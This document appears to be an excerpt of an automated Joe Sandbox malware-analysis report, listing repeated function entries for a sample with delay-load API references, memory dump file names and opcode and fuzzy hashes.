                                                                                                    Function 00E1E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: d0a0d2ee7dbb9b21e739e27a7ab563fb40f687698faa31d0a73f4ae8db732cde
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: d0a0d2ee7dbb9b21e739e27a7ab563fb40f687698faa31d0a73f4ae8db732cde
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    Function 00E1E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: da0f33cd1f0cf5a6b1fb3dc5f9485f8af8d89dd78d592e25e3e7e135ba550c40
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: da0f33cd1f0cf5a6b1fb3dc5f9485f8af8d89dd78d592e25e3e7e135ba550c40
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    Function 00E1E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 85165d6f684004f0153270e43041af3252343194f79a8782280afe0d4edf3d74
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: 85165d6f684004f0153270e43041af3252343194f79a8782280afe0d4edf3d74
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    Function 00E1E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 28530365780b5150a9edc2e38cf053ab8c15db8b6bf46c57c88a338e9af58ccf
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: 28530365780b5150a9edc2e38cf053ab8c15db8b6bf46c57c88a338e9af58ccf
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    Function 00E1E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: d334d90a603b2dc6a39144c1fd8ec6b795a7d4fe83f843aebf2d93cac0ed87c7
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: d334d90a603b2dc6a39144c1fd8ec6b795a7d4fe83f843aebf2d93cac0ed87c7
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    Function 00E1E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: a564e80c3c29c832b570d653396bed0aa4143d068112b7ce0debac75a7a49ad9
                                                                                                    • Instruction ID: 57ea32f08cd108849e139c8f8d326aaa4a7b66c817cd98593b391720f3177f13
                                                                                                    • Opcode Fuzzy Hash: a564e80c3c29c832b570d653396bed0aa4143d068112b7ce0debac75a7a49ad9
                                                                                                    • Instruction Fuzzy Hash: 08A011E2AA8202BC300822A02C0BCBB028EC8C0F20330B82EFC02B0280A88008820830
                                                                                                    Function 00E1E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: 3a0171e87098a6aacaf451cc710fef1d7d10842d732f73b0f5932f9653ad3a5f
                                                                                                    • Instruction ID: 57ea32f08cd108849e139c8f8d326aaa4a7b66c817cd98593b391720f3177f13
                                                                                                    • Opcode Fuzzy Hash: 3a0171e87098a6aacaf451cc710fef1d7d10842d732f73b0f5932f9653ad3a5f
                                                                                                    • Instruction Fuzzy Hash: 08A011E2AA8202BC300822A02C0BCBB028EC8C0F20330B82EFC02B0280A88008820830
                                                                                                    Function 00E1E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    • Opcode ID: fcbcb7acaaf1f29daa035b0fd80ba4be5d986dbf4f2a1d70770be489a189f42d
                                                                                                    • Instruction ID: 70b10b50e3458ddbde85e9ad233bf9710cacb6e1b1a740570feb547148014488
                                                                                                    • Opcode Fuzzy Hash: fcbcb7acaaf1f29daa035b0fd80ba4be5d986dbf4f2a1d70770be489a189f42d
                                                                                                    • Instruction Fuzzy Hash: F1A011E22A8202BC300822002C0BCBB0A0EC8C2F20330B82EFC02B0280A8800C820A30
                                                                                                    Function 00E1E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: af17664e9d2caa8e79bf59642ecff7dc79f6a07131e1bacc291b6ea8e182a8dd
                                                                                                    • Instruction ID: 9e61e4c0858a4a18d9f9c19354b22a9a012dcb945b0b203501bffb01b5396233
                                                                                                    • Opcode Fuzzy Hash: af17664e9d2caa8e79bf59642ecff7dc79f6a07131e1bacc291b6ea8e182a8dd
                                                                                                    • Instruction Fuzzy Hash: 26A011E2AA82003C300822A02C0BCBB0A8EC8C0F22330B22EFC00B0280A88008820830
                                                                                                    Function 00E1E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    • Opcode ID: 28ec5eba7d66562ccb3cee51ed2c7500471038833aac0ce76cb3d39ce89b8b63
                                                                                                    • Instruction ID: 70b10b50e3458ddbde85e9ad233bf9710cacb6e1b1a740570feb547148014488
                                                                                                    • Opcode Fuzzy Hash: 28ec5eba7d66562ccb3cee51ed2c7500471038833aac0ce76cb3d39ce89b8b63
                                                                                                    • Instruction Fuzzy Hash: F1A011E22A8202BC300822002C0BCBB0A0EC8C2F20330B82EFC02B0280A8800C820A30
                                                                                                    Function 00E1E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
